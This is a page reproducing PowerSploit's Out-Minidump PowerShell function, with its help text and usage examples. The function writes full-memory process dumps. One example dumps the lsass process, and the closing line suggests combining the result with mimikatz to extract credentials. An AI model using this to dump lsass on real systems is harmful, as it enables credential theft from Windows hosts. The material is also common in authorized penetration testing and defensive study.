The original source of this function is available on Github here
You can use this function to generate a process dump file using Powershell.
function Out-Minidump { [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)] [System.Diagnostics.Process] $Process, [Parameter(Position = 1)] [ValidateScript({ Test-Path $_ })] [String] $DumpFilePath = $PWD ) BEGIN { $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') $Flags = [Reflection.BindingFlags] 'NonPublic, Static' $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) $MiniDumpWithFullMemory = [UInt32] 2 } PROCESS { $ProcessId = $Process.Id $ProcessName = $Process.Name $ProcessHandle = $Process.Handle $ProcessFileName = "$($ProcessName)_$($ProcessId).dmp" $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, $ProcessId, $FileStream.SafeFileHandle, $MiniDumpWithFullMemory, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)) $FileStream.Close() if (-not $Result) { $Exception = New-Object ComponentModel.Win32Exception $ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))" # Remove any partially written dump files. For example, a partial dump will be written # in the case when 32-bit PowerShell tries to dump a 64-bit process. Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue throw $ExceptionMessage } else { Get-ChildItem $ProcessDumpPath } } END {} }
Description and how to use this function :
SYNOPSIS
Generates a full-memory minidump of a process.
PowerSploit Function: Out-Minidump
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
DESCRIPTION
Out-Minidump writes a process dump file with all process memory to disk.
This is similar to running procdump.exe with the ‘-ma’ switch.
PARAMETER Process
Specifies the process for which a dump will be generated. The process object
is obtained with Get-Process.
PARAMETER DumpFilePath
Specifies the path where dump files will be written. By default, dump files
are written to the current working directory. Dump file names take following
form: processname_id.dmp
EXAMPLE
Out-Minidump -Process (Get-Process -Id 4293) Description ----------- Generate a minidump for process ID 4293.
EXAMPLE
Get-Process lsass | Out-Minidump Description ----------- Generate a minidump for the lsass process. Note: To dump lsass, you must be running from an elevated prompt.
EXAMPLE
Get-Process | Out-Minidump -DumpFilePath C:\temp Description ----------- Generate a minidump of all running processes and save them to C:\temp.
INPUTS
System.Diagnostics.Process
You can pipe a process object to Out-Minidump.
OUTPUTS
System.IO.FileInfo
This script is a part of a tool suite available here. This script can be combined with mimikatz tool to get information from a dump file from the process lsass.